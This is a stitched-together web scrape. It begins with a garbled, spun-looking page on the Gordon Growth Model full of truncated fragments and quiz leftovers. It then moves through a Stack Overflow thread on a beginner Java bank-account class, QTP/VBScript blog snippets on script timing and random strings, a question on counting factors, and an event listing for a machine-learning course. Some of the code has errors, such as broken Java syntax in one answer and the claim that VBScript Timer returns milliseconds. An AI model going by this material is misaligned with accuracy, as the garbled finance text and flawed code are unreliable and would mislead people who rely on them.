prendre en compte. Gordon model calculator assists to calculate the constant growth rate (g) using required rate of return (k), current price and current annual dividend. Code to add this calci to your website Just copy and paste the below code to your webpage where you want to display this calculator\n\nGordon Growth Model. With the basic DDM equation, we assume an infinite/constant series of cash dividends. To add complexity to the model, we can include an estimate of the growth rate, (g), for the dividends, so that they increase over time. In practice, this works best for mature companies in non-cyclic industries, like utility companies. This model is called the Gordon Growth Model. Gordon. The Gordon growth model assumes that: Dividends grow at a constant growth rate g. Discount rate r is constant and is greater than g. Dividends bear and understandable and consistent relationship with profits. The value of a stock using the Gordon growth model is: If prices are efficient (price equals value), the price is expected to grow at a rate of g, known as the rate of price appreciation. E.27.1 The Gordon growth model[???work in progress] In Section 22.2.1 we describe an application of linear valuation theory based on the discounted cash-flow model, according to I got this email from Mike Adhikari informing me about the Advanced Growth Model that he introduced as a better model compared to over-simplified capital structure assumption in the Gordon Growth Model. Hello Sukarnen: Capitalization 2.0 will be released at the NACVA Conference on June 5th, 2019. The current single-period capitalization method, and the method used [ Gordon and Shapiro (1956) apply the one-stage constant growth model to dividends, assuming that they grow at a constant rate g: (3b) PVE 0 = Div 1 K E - g In this case, K E can also be expressed as follows\n\n### Das Dividendendiskontierungsmodell / Gordon-Growth-Model\n\n• The simplest form of the Dividend Discount Model is the Gordon Growth Model, named after the American economist Professor Myron J. Gordon. GGM assumes the company's business will last indefinitely and the dividend payments increase at a constant rate year to year. If the value calculated is higher than the current trading price, the stock is undervalued and may qualify as a signal to buy. 
On.\n• es.\n• Gordon Growth Model Gordon Growth Model The Gordon Growth Model - also known as the Gordon Dividend Model or dividend discount model - is a stock valuation method that calculates a stock's intrinsic value, regardless of current market conditions. Investors can then compare companies against other industries using this simplified model ; Multiple-Period Dividend Discount Model Multiple.\n• The Gordon Growth Model is also referred to as the dividend discount model. The formula is applicable for dividend-paying stocks only and the formula for the stock valuation is computed by dividing the next year's dividend per share by the difference between the investor's required rate of return and dividend growth rate. Mathematically, it is represented as\n\n### What is the Gordon Growth Model? A Definition and Example\n\nGordon Growth Dividend Model Criticism. No external Financing: The model assumes that company finances with retained earnings only. It does not look for external financing. However in reality a company go for a blend of internal as well as external financing. Constant return: Gordon's model is based on the assumption that returns are constant. Gordon Growth Model is great as it allows for a simple and rememberable way to simplify quite complex value calculations. The formula is one of the fundamentals of modern investment analysis. Yet it has its limitations and hidden assumptions that should be taken into consideration when creating your own financial models\n\n1. The Gordon Growth Model assesses the reason of dividend growth. If all earnings of a company are distributed as dividend the company will not have additional capital to invest. The Gordon Growth model formula is given below: G = bR. b = The proportion of earnings retained. R = The rate that profits are earned on new investments . Modigliani and Miller's dividend irrelevancy theory. According.\n2. Gordon Growth Model in Excel. We have developed Gordon Growth Model in Excel template that you can use to value any stock using this model. The excel template also showcases the Duke Energy example as shown above. The excel template makes use of the MarketXLS hf_ functions to fetch all market data\n3. The dividend discount model (DDM or the Gordon Growth Model) is a method of valuing a company's stock price based on the theory that its stock is worth the sum of all of its future dividend payments discounted back to their present value. The short-form of the dividend discount model just takes a multiple of pro forma dividend payments. It certainly has its limitation in practical use.\n4. You may want to perform a valuation calculation on your investments to ensure you're not overpaying. There are many different methods to this madness, but the Gordon growth model is particularly well suited for companies with steady dividend growth. Here's a closer look at this valuation technique. What is the..\n5. Considering a fact that I am currently, at my International Financial Risk Management Course, covering Gordon's Growth (also known as Dividend Discount) Model, I take a bit of time to shed some light on this excellent piece of Financial Theory and shed some light on various legal structures (C-Corporations vs. REITs).. The Gordon Growth Model — otherwise described as the dividend.\n\n### Gordon Growth Model - Financial Markets by Yale University\n\nGordon Growth Model: The Gordon growth model is also called a dividend discount model. 
It will help to use to determine the intrinsic worth of stock supported a future series of dividends that grow at a continuing rate. Most of the investors can compare companies against other industries in the simple method. These are one of the types of growth models in the stock. The formula of the Gordon.", null, "A model for determining the intrinsic value of a stock, based on a future series of dividends that grow at a constant rate. Given a dividend per share that is payable in one year, and the assumption that the dividend grows at a constant rate i The Gordon growth model is a variant of the discounted cash flow model. Expected Return on Investment (Gordon Growth Model) This website may use cookies or similar technologies to personalize ads (interest-based advertising), to provide social media features and to analyze our traffic\n\n### Gordon growth model vs multi-stage dividend discount model\n\n2. Gordon Growth Discount Model. The Gordon growth discount model defers slightly from the other methods. This model assumes the dividends will increase at the same rate indefinitely. To get the intrinsic value of the company, dividends are forecasted to the next period and then dividend by (cost of equity - growth rate). Why does it matter? This dividend discount model template provides an easy.\n3. e what the value of the proposed company's stock would be in time to come. Continue reading for more information about this model. Understanding the Gordon Growth Model. You may be hearing about this model for the first time or have heard but didn't pay much attention or consider how relevant it is.\n\nThe Barro-Gordon Model M. McMahon University of Warwick July 29, 2014 This note outlines the Barro-Gordon model of time-consistent monetary policy, dis-cussing the meaning of the equations and how to solve the model. I also present a game-theoretic outline of what is going on in the model which may help some of you to understand the material more easily. This note is not a substitute for. M. J. Gordon* T HE three possible hypotheses with respect to what an investor pays for when he ac- quires a share of common stock are that he is buying (i) both the dividends and the earnings, (2) the dividends, and (3) the earnings. It may be argued that most commonly he is buying the price at some future date, but if the future price will be related to the expected dividends and/or earnings. Under this model the share price is calculated as the present value of all future dividend payments that the investor expects to receive from the share held. It is assumed that the dividends are paid in perpetuity (forever) and that the dividends grow at a constant rate each year. This model is also called the Gordon Growth Model, named after Myron Gordon Unlike a lengthy cash flow analysis, the Gordon Growth Model allows any expected growth to be incorporated (as a constant) into an assumed perpetual income stream. The approach is not only reasonably simple, but incorporates an inflated reversionary value as part of the perpetually growing income stream. The overall rate of return, including the income growth component, allows the appraiser to.\n\nGordon Growth Model is a model to determine the fundamental value of stock, based on the future sequence of dividends that mature at a constant rate, provided that the dividend per share is payable in a year, the assumption of the growth of dividend at a constant rate is eternity, the model helps in solving the present value of the infinite series of all future dividends. 
Since the assumption. Gordon growth model (Dividend discount model) uses the assumed relationship of the constantly growing dividend amount received in perpetuity and the share price and is used to : calculate market value of share (equity) = present value of future dividends; P 0 = D 1 / (K e - g) calculate cost of equity (or required rate of return) K e = (D 1 /P 0) + g . where: K e = cost of equity. D 1. In the Gordon Growth (dividend discount) Model, the growth rate is assumed to be the required return on equity. O a. proportional to O b. Blank equal to O d. greater than e. less than fullscreen. check_circle Expert Answer. Want to see the step-by-step answer? See Answer. Check out a sample Q&A here. Want to see this answer and more? Experts are waiting 24/7 to provide step-by-step solutions. Gordon growth model, also known as 'Constant Growth Rate DCF Model', has been named after Professor Myron J. Gordon. As the name implies, this model works on the underlying assumption that the company will continue to pay the dividend amount as a fixed multiple of growth in the future, as it is paying now Gordon growth model is based on the dividend discount model, and helps in deriving a target price-to-tangible book at which the bank should ideally trade, considering the sustainable return on tangible equity (RoTE), cost of equity (CoE) and earnings growth rates (g). The biggest attractiveness of GGM is its simplicity and intuitive attractiveness", null, "### What Is the Gordon Growth Model? The Motley Foo\n\n1. The PV of a growing perpetuity is calculated through the Gordon Growth Model, a financial formula used with the time value of money. Present Value = Payment Amount ÷ (Interest Rate - Payment Growth Rate) Where: Payment is the payment each period. Rate of Return is a decimal rate of return per period (the calculator above uses a percentage). A return of 2.2% per period would be.\n2. Das Gordon Growth Model (auch Dividendenwachstumsmodell bezeichnet) ist ein nach M.J. Gordon benanntes Modell zur Berechnung des Wertes einer Investition unter der Annahme eines gleichbleibenden Wachstums der Dividenden berechnet, das zu den Discounted Cash-Flow-Verfahren der Unternehmensbewertung gehört und eines der meist genutzten Verfahrens zur Berechnung des Endwerts einer Investition ist\n3. Gordon Growth Model Formula Calculator (Excel template\n4. Gordon Growth Model Formulas Calculation Example\n5. Explaining Gordon Growth Valuation Technique in Excel\n7. Understanding the Gordon Growth Model for Stock Valuation", null, "### Dividend discount model - Wikipedi\n\n1. What is the Gordon Growth Model? - wiseGEE\n2. Gordon Growth Model - readyratios\n3. Gordon Growth Model (GGD) - Financial Edge Trainin\n4. 
The Definitive Guide to Gordon Growth Model Cleveris" ]
[ null, "https://knihyzacal.com/xrlove/gMickrQWE6pCcV_zwyB3TAHaEK.jpg", null, "https://knihyzacal.com/xrlove/3qZItehhEXw.jpeg", null, "https://knihyzacal.com/xrlove/9R72Qr6qrg7CY_2jfThvPQHaFl.jpg", null, "https://knihyzacal.com/xrlove/t4VgOVBRAq19XMW1KWggJwHaDq.jpg", null, "https://knihyzacal.com/xrlove/8mLPIoZ48fal9GJaavVicAHaFj.jpg", null, "https://knihyzacal.com/xrlove/OCFSBvmFKXpaUFfoEDl_ngHaEL.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90344423,"math_prob":0.9352916,"size":27638,"snap":"2021-31-2021-39","text_gpt3_token_len":5831,"char_repetition_ratio":0.21668959,"word_repetition_ratio":0.09758167,"special_character_ratio":0.20558651,"punctuation_ratio":0.085278794,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.989127,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-18T13:03:54Z\",\"WARC-Record-ID\":\"<urn:uuid:c0385793-9377-40cd-8542-dd27b2618fdd>\",\"Content-Length\":\"50256\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:87de366e-6bc7-4f78-b313-26a84747f8a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:81a36ff5-2e51-47f9-b33a-2d8f91b4c342>\",\"WARC-IP-Address\":\"5.61.51.234\",\"WARC-Target-URI\":\"https://knihyzacal.com/terminal-value-gordon-growth-model-daah/too1334oqpx0\",\"WARC-Payload-Digest\":\"sha1:V7VL45QNFISZ4EIKO2I7CU2J3GSMUJZG\",\"WARC-Block-Digest\":\"sha1:Q7HP33AH2YKLBQO7YNNOVL6XMVCGWESG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780056476.66_warc_CC-MAIN-20210918123546-20210918153546-00275.warc.gz\"}"}
https://stackoverflow.com/questions/16519644/if-statement-is-being-missed-in-bank-account-class
[ "# If statement is being missed in Bank Account Class?\n\nI am having some issues with the following syntax.\n\nI am currently learning Java and have been going through a past exam paper to help build my knowledge of Java.\n\nHere is the question:\n\nWrite a class Account that has instance variables for the account number and current balance of the account. Implement a constructor and methods getAccountNumber(), getBalance(), debit(double amount) and credit(double amount). In your implementations of debit and credit, check that the specified amount is positive and that an overdraft would not be caused in the debit method. Return false in these cases. Otherwise, update the balance.\n\nI have attempted to do this HOWEVER, I have not implemented the boolean functions for debit and credit methods. I just wanted to build the program first and attempt to get it working. I was going to look at this after as I was not sure how to return true or false whilst also trying to return an amount from the said methods.\n\nPlease forgive any errors in my code as I am still learning Java.\n\nI can run my code, but when I enter deposit it does not seem to work correctly and I would appreciate any pointers here please.\n\nHere is my code:\n\n``````import java.util.*;\n\npublic class Account {\n\nprivate int accountNumber;\nprivate static double currentBalance;\nprivate static double debit;\n\n// ***** CONSTRUCTOR *****//\npublic Account(double currentBalance, int accountNumber) {\naccountNumber = 12345;\ncurrentBalance = 10000.00;\n}\n\npublic int getAccountNumber(int accountNumber) {\nthis.accountNumber = accountNumber;\nreturn accountNumber;\n}\n\npublic double getcurrentBalance(double currentBalance) {\nthis.currentBalance = currentBalance;\nreturn currentBalance;\n}\n\npublic static double debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nreturn currentBalance;\n}\n\npublic static double credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nreturn currentBalance;\n}\n\npublic static void main(String [] args){\nString withdraw = \"Withdraw\";\nString deposit = \"Deposit\";\ndouble amount;\nScanner in = new Scanner(System.in);\nSystem.out.println(\"Are you withdrawing or depositing? \");\nString userInput = in.nextLine();\nif(userInput == withdraw)\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\nif(amount > currentBalance)\n\ndebit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\nif (userInput == deposit)\nSystem.out.println(\"Enter amount to deposit: \");\namount = in.nextDouble();\ncredit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\n}\n}\n``````\n\nAgain please forgive any errors in my code. I am still learning its syntax.\n\n• This is not python. Place brackets for your ifs – Boris Strandjev May 13 '13 at 10:20\n• That was some very bad advice. – Marko Topolnik May 13 '13 at 10:21\n• Your debit and credit methods should return a boolean. – Adegoke A May 13 '13 at 10:21\n• @PrimalScientist Its not required if you only need to execute one statement. Even though, its always recommended to use them – Evans May 13 '13 at 10:22\n• Never use `==` for String comparison. Use `equals()`. 
– Axel May 13 '13 at 10:22\n\nIn the if-statement `if(userInput == withdraw)` you are attempting to compare `String` objects.\n\nIn Java to compare `String` objects the `equals` method is used instead of the comparison operator `==`\n\n``````if(userInput.equals(withdraw))\n``````\n\nThere are several instances in the code that compares `String` objects using `==` change these to use `equals`.\n\nAlso when using conditional blocks it is best to surround the block with braces `{}`\n\n``````if(true){\n\n}\n``````\n• This is great. Thank you for this. – PrimalScientist May 13 '13 at 10:24\n• @PrimalScientist I'm glad I can help. It looks like you keep your code pretty neat and organized. Keep it up! The braces will help make it more readable also. – Kevin Bowersox May 13 '13 at 10:29\n• @PrimalScientist you can also use `if(userInput.equalsIgnoreCase(\"withdraw\"))` – Adegoke A May 13 '13 at 10:35\n• Many thanks for your feedback. I have never seen this syntax before!! – PrimalScientist May 13 '13 at 10:35\n• Thanks Kevin. I will =] – PrimalScientist May 13 '13 at 10:41\n\nYou don't use brackets so only the first line after your if-statement gets executed. Also, String's should be compared using `.equals(otherString)`. Like this:\n\n``````if(userInput.equals(withdraw))\nSystem.out.println(\"Enter amount to withdraw: \"); //Only executed if userInput == withdraw\namount = in.nextDouble(); //Always executed\n\nif(userInput.equals(withdraw)) {\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\n//All executed\n}\n``````\n\nDo this:\n\n``````if(userInput.equals(withdraw)) {\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\nif(amount > currentBalance)\n\ndebit(currentBalance, amount);\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n}\n\nif (userInput.equals(deposit)) {\nSystem.out.println(\"Enter amount to deposit: \");\namount = in.nextDouble();\ncredit(currentBalance, amount);\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n}\n``````\n\nNote that if your amount to withdraw exceeds your current balance, you will get a 'warning message' but your withdrawal will continue. Thus you'll end up with a negative sum of money. If you don't want to do this, you have to change it accordingly. But, this way it shows how the use of brackets (or not using them) has different effects.\n\n• Hmm, ok thank you for your feedback. – PrimalScientist May 13 '13 at 10:21\n• @Joetjah Note; in your answer you are still using string == which will not work: stackoverflow.com/questions/513832/… – Richard Tingle May 13 '13 at 10:25\n• Changed as such. – Joetjah May 13 '13 at 10:26\n• Well, what you can do is only return a boolean, since your `currentBalance` is class-wide anyway, you can get the change of money. Like so: `if (debit(currentBalance, amount)) { System.out.println(\"Your money has been decreased to \" + currentBalance); } else { System.out.println(\"Transaction cancelled.\"); }` – Joetjah May 13 '13 at 10:31\n• If you really want to return 2 values, you have to create an object or class that encapsulates both. stackoverflow.com/questions/457629/… I wouldn't do that in this setting though. – Joetjah May 13 '13 at 10:32\n``````if (userInput == deposit)\n``````\n\nshould be\n\n``````if (userInput.equals(deposit))\n``````\n\nSame for withdrawal.\n\n• Thank you for this. Great help here. 
– PrimalScientist May 13 '13 at 10:24\n\nOn these methods:\n\n``````public static double debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nreturn currentBalance;\n}\n\npublic static double credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nreturn currentBalance;\n}\n``````\n\nThe inputs to the functions really shouldn't include the current balance, the object already knows what the current balance is (its being held in the objects currentBalance field, which as has been pointed out shouldn't be static).\n\nImagine a real cash machine that behaved like this:\n\n``````Whats my current balance:\n£100\nCreditAccount(\"I promise my current balance is £1 Million, it really is\", £10):\nBalance:£1,000,010\n``````\n\nEdit: Include code to behave like this\n\n``````import java.util.*;\n\npublic class Account {\n\nprivate int accountNumber;\nprivate double currentBalance; //balance kept track of internally\n\n// ***** CONSTRUCTOR *****//\n\npublic Account(int accountNumber, double currentBalance) {\nthis.accountNumber = accountNumber;\nthis.currentBalance = currentBalance;\n}\n\npublic int getAccountNumber() {\nreturn accountNumber;\n}\n\npublic double getcurrentBalance() {\nreturn currentBalance;\n}\n\npublic boolean debit(double amount) {\n//we just refer to the objects fields and they are changed\n\nif (currentBalance<amount){\nreturn false; //transaction rejected\n}else{\ncurrentBalance -= amount;\nreturn true;\n//transaction approaved and occured\n}\n\n//Note how I directly change currentBalance, there is no need to have it as either an input or an output\n\n}\n\npublic void credit( double amount) {\n//credits will always go through, no need for return boolean\ncurrentBalance += amount;\n\n//Note how I directly change currentBalance, there is no need to have it as either an input or an output\n}\n\npublic static void main(String [] args){\nAccount acc=new Account(1234,1000);\n\nacc.credit(100);\n\nSystem.out.println(\"Current ballance is \" + acc.getcurrentBalance());\n\nboolean success=acc.debit(900); //there is enough funds, will succeed\n\nSystem.out.println(\"Current ballance is \" + acc.getcurrentBalance());\nSystem.out.println(\"Transaction succeeded: \" + success);\n\nsuccess=acc.debit(900); //will fail as not enough funds\n\nSystem.out.println(\"Current ballance is \" + acc.getcurrentBalance());\nSystem.out.println(\"Transaction succeeded: \" + success);\n\n}\n}\n``````\n\nI've not bothered using the typed input because you seem to have the hang of that\n\n• Many thanks for your feedback. How else could I amend the currentBalance variable though? Or would by returning the amount do this automatically? – PrimalScientist May 13 '13 at 10:47\n• @PrimalScientist I've updated my answer to answer as an example but basically a non static method can access any non static field of the class (i.e. any account method can access accountNumber and currentBalance). Thats one of the founding principles of Object Orientated code – Richard Tingle May 13 '13 at 11:00\n• Nice one. Many thanks Richard. Again great feedback. – PrimalScientist May 13 '13 at 11:01\n• Yes I see this now. Quick question Richard, here you have created a new object: Account acc=new Account(1234,1000); So this is the account number and the amount in the bank. I could also amend the code to take user input and amend accordingly. 
– PrimalScientist May 13 '13 at 17:04\n• Of course, the most sensible way would probably be to ask the user for that information and then create the object using the constructor. But you could equally create a blank constructor and them give it the information piece by piece. The choice is yours but its generally considered good practice for an object to recieve the information it needs to work in the constructor (so an object is garanteed to work if it exists, rather than \"You've forgotton to to call these 3 methods after construction hence your problem\") – Richard Tingle May 13 '13 at 17:19\n\nWithout '{' and '}' the first line after an if statement only gets executed as part of that statement. Also, your `if (userInput == deposit)` block isn't correctly indented, it shouldn't be under the `if (userInput == withdraw)`. And string comparisons should be done using `userInput.equals(withdraw)`\n\nFor the debit and credit methods:\n\n``````public static boolean debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nif<currentBalance < 0){\nreturn false\n}\nreturn true;\n}\n\npublic static boolean credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nif<currentBalance > 0){\nreturn false\n}\nreturn true;\n}\n``````\n\nNow I think I have the boolean values mixed up. The description is a little bit unclear on what to return for each method.\n\nUse equals() method instead == which compares the equality of Objetcs rather values\n\n``````import java.util.*;\n\npublic class Account{\n\nprivate int accountNumber;\nprivate static double currentBalance;\nprivate static double debit;\n\n// ***** CONSTRUCTOR *****//\npublic Account(double currentBalance, int accountNumber) {\naccountNumber = 12345;\ncurrentBalance = 10000.00;\n}\n\npublic int getAccountNumber(int accountNumber) {\nthis.accountNumber = accountNumber;\nreturn accountNumber;\n}\n\npublic double getcurrentBalance(double currentBalance) {\nthis.currentBalance = currentBalance;\nreturn currentBalance;\n}\n\npublic static double debit(double currentBalance, double amount) {\ncurrentBalance -= amount;\nreturn currentBalance;\n}\n\npublic static double credit(double currentBalance, double amount) {\ncurrentBalance += amount;\nreturn currentBalance;\n}\n\npublic static void main(String [] args){\nString withdraw = \"Withdraw\";\nString deposit = \"Deposit\";\ndouble amount;\nScanner in = new Scanner(System.in);\nSystem.out.println(\"Are you withdrawing or depositing? \");\nString userInput = in.nextLine();\nif(userInput.equals(withdraw))\nSystem.out.println(\"Enter amount to withdraw: \");\namount = in.nextDouble();\nif(amount > currentBalance)\n\ndebit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\nif (userInput .equals(deposit))\nSystem.out.println(\"Enter amount to deposit: \");\namount = in.nextDouble();\ncredit(currentBalance, amount);\n\nSystem.out.println(\"Your new balance is: \" + currentBalance);\n\n}\n}\n``````\n• Ahh many thanks. I can see the amendments there. Very helpful. – PrimalScientist May 13 '13 at 10:26" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8450096,"math_prob":0.7375253,"size":2765,"snap":"2019-26-2019-30","text_gpt3_token_len":565,"char_repetition_ratio":0.18326694,"word_repetition_ratio":0.048346058,"special_character_ratio":0.22640145,"punctuation_ratio":0.17879418,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9576026,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-17T11:39:57Z\",\"WARC-Record-ID\":\"<urn:uuid:586468e6-026e-49e4-9472-bb393945d951>\",\"Content-Length\":\"193200\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f219c34c-85f8-4b60-97da-202e5c5f64e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:23b64c1a-9bd1-4f3b-b139-4174324ef94f>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://stackoverflow.com/questions/16519644/if-statement-is-being-missed-in-bank-account-class\",\"WARC-Payload-Digest\":\"sha1:PZLVPB4HPP327LDRYD75JCCJPPUDUYQ7\",\"WARC-Block-Digest\":\"sha1:HDAVOIDJRBJ3OZ24PS62BSHFG2O7LJLV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195525136.58_warc_CC-MAIN-20190717101524-20190717123524-00237.warc.gz\"}"}
http://www.qtpschool.com/2012/03/
[ "## Thursday, March 22\n\n### How to track execution time of the script in QTP\n\nHello Friends,\n\nIn this post, we'll see how to measure the total time taken by a test/script in execution.\n\nIt's easy to get execution time using Timer, but here we will measure the time and convert it to Hr-Min-Sec format. Let's see how-\n\nDim StartTime, EndTime\nStartTime = Timer\nFor I = 1 To 5\nwait 1\nNext\nEndTime = Timer\nTimeTaken = EndTime - StartTime\nmsgbox TimeTaken\n\nYou have execution time stored in 'TimeTaken' variable but it is in milisecond format\n\nNow, let's convert it to Hr-Min-Sec. It will clearly tell you how many seconds, minutes or hours (if any :) ) have been taken by the script. Following is the function to do the job for us. Just pass the 'TimeTaken' to it and chill :)\n\nFunction func_ExecutionTime(TimeTaken)\nIf TimeTaken>=3600 Then\nhr=int(TimeTaken/3600)\nrem1=int(TimeTaken mod 3600)\nstr=hr&\" hr \"\nIf rem1>=60 Then\nmin=int(rem1/60)\nsec=int(rem1 mod 60)\nstr=str&min&\" min \"&sec&\" sec.\"\nelse\nsec=rem1\nstr=str&sec&\" sec.\"\nEnd If\nElse If TimeTaken>=60 Then\nmin=int(TimeTaken/60)\nsec=int(TimeTaken mod 60)\nstr=str&min&\" min \"&sec&\" sec.\"\nelse\nsec=TimeTaken\nstr=str&sec&\" sec.\"\nEnd If\nEnd If\nfunc_ExecutionTime = str\nEnd Function\n\nHow to call this function -\n\nTimeTaken_HMS =  func_ExecutionTime(TimeTaken)\nmsgbox TimeTaken_HMS\n\nIf you have multiple actions in your test, you can measure the execution time for every individual action.\n\nPost you comments for any queries/feedback.\n\n## Thursday, March 15\n\n### Generate a random string in QTP/vbscript\n\nHello Friends,\n\nSometime script/application requires some input data as string which is unique. Random strings is helpful is this scenario. Lets see how to generate random input string in qtp.\n\nFunction GenerateRandomString(StrLen)\nDim myStr\nConst MainStr= \"0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\"\nFor i = 1 to StrLen\nmyStr=myStr & Mid(MainStr,RandomNumber(1, Len(MainStr)),1)\nNext\nGenerateRandomString = myStr\nEnd Function\n\nHere StrLen(argument) is the required length of the string. Call this function as below-\n\nMsgBox GenerateRandomStrin(6)\n\nIt will generate a string of 6 characters." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7005225,"math_prob":0.87268806,"size":2814,"snap":"2019-51-2020-05","text_gpt3_token_len":803,"char_repetition_ratio":0.14590748,"word_repetition_ratio":0.98623854,"special_character_ratio":0.26226014,"punctuation_ratio":0.07372401,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.953766,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-23T00:33:57Z\",\"WARC-Record-ID\":\"<urn:uuid:4763fd46-2132-4a74-82c3-3214ece832da>\",\"Content-Length\":\"72612\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c8ca4407-553b-4e23-9394-63c5e6d5e925>\",\"WARC-Concurrent-To\":\"<urn:uuid:f8f1728d-42a4-45fd-a88f-8be979dbf3f5>\",\"WARC-IP-Address\":\"172.217.7.147\",\"WARC-Target-URI\":\"http://www.qtpschool.com/2012/03/\",\"WARC-Payload-Digest\":\"sha1:XBHNBUUHVISMS5JCD7MH75DWIZME2BFO\",\"WARC-Block-Digest\":\"sha1:N2DBOYUSLH53VZDVNOTOSVCVKI4VBVYZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250607596.34_warc_CC-MAIN-20200122221541-20200123010541-00271.warc.gz\"}"}
https://learn.careers360.com/jobs/question-find-which-number-has-oddnbspnbspfactors-of-following-numbers-8427/
[ "# Find which number has odd  factors of following numbers Option 1) 1200Option 2) 20000Option 3) 360Option 4) None of theseOption 5) 17100\n\nNumber of factors of 1200=24*31*52=5*2*3 = 30\n\nNumber of factors of 20000 = 25*54 = 6*5 =30\n\nNumber of factors of 360 = 23*32*51 = 4*3*2 = 24\n\nNumber of factors of 17100 = 22*32*52*191 = 3*3*3*2 =54\n\nBoost your Preparation for JEE Main 2021 with Personlized Coaching\n\nExams\nArticles\nQuestions" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81626624,"math_prob":0.9904027,"size":507,"snap":"2020-45-2020-50","text_gpt3_token_len":220,"char_repetition_ratio":0.26242545,"word_repetition_ratio":0.73913044,"special_character_ratio":0.57593685,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9991862,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T09:35:10Z\",\"WARC-Record-ID\":\"<urn:uuid:f144750d-035d-47d5-b012-290d78483036>\",\"Content-Length\":\"766034\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:89cd628b-dc55-4897-bd36-29a66d1b7c14>\",\"WARC-Concurrent-To\":\"<urn:uuid:57fec1ca-9756-4e90-9786-14d9b7984b16>\",\"WARC-IP-Address\":\"13.127.40.139\",\"WARC-Target-URI\":\"https://learn.careers360.com/jobs/question-find-which-number-has-oddnbspnbspfactors-of-following-numbers-8427/\",\"WARC-Payload-Digest\":\"sha1:NQMGIJ4PTDNXB5WYC2NSEVZW6E7TWNFH\",\"WARC-Block-Digest\":\"sha1:SPIB3QPV2ACWRN64XAKVDET4HD3PAPHW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141672314.55_warc_CC-MAIN-20201201074047-20201201104047-00408.warc.gz\"}"}
https://www.meraevents.com/event/applied-machine-learning-and-data-analytics
[ "", null, "# Applied Machine Learning and Data Analytics\n\n• ## Special Offer\n\nSale Date Ended\n\nINR 25000\nSold Out\n• ## Early Bird Offer\n\nSale Date Ended\n\nINR 30000\nSold Out\n• ## Entry Pass\n\nSale Date Ended\n\nINR 35000\nSold Out\n\n#### Invite friends\n\nPage Views : 78\n\nCourse Duration:              80 Hours\n\nCourse Evaluation:           Module wise quizzes and a projects\n\nCourse Objective:             This course aims to provide solid understanding of data science theory and applications in business. Focus will be on the underlying scientific concepts while also accounting for recent progress made by the scientific and technical community in the field of data science. The course will draw examples from various case studies and thus emphasis will be on application. Associate shall get a hands-on experience in the application of these techniques for addressing practical problems from retail domain.\n\nInstructor's Bio:\n\nThe course will be conducted by an Assistant Professor at IIT Kharagpur. His teaching interests include non-linear programming, multivariate statistical models, generalized linear models, machine learning and data analytics. He has offered various courses, lectures and workshops on applied machine learning and data analytics at IIT Kharagpur and other premier institute.\n\nCourse Content\n\nModule A: Basics (20 Hours)\n\nA.1         Probability and Statistics basics\n\n1. Sample Space and Events\n2. Random variables\n3. Sampling and distributions\n4. Parameter Estimation\n5. Hypothesis Testing\n6. Multivariate Normal Distribution (Gaussian)\n7. ANOVA, ANCOVA, MANOVA, MANCOVA\n8. Non-parametric Tests\n\nA.2         Matrix Algebra and Random Vectors basics\n\n1. Matrix and Vector Algebra\n2. Positive Definite Matrices\n3. Square Root Matrix\n4. Random Vectors and Matrices\n5. Matrix Inequalities and Maximization\n6. Eigen Values and Eigen vectors\n7. Spectral Decomposition\n8. Singular Value Decomposition (SVD)\n9. Non Negative Matrix Factorization (NMF)\n\nA.3         Multivariable Calculus and optimization basics\n\n1. Multivariate Differential & Integral calculus\n2. Directional Derivatives\n3. 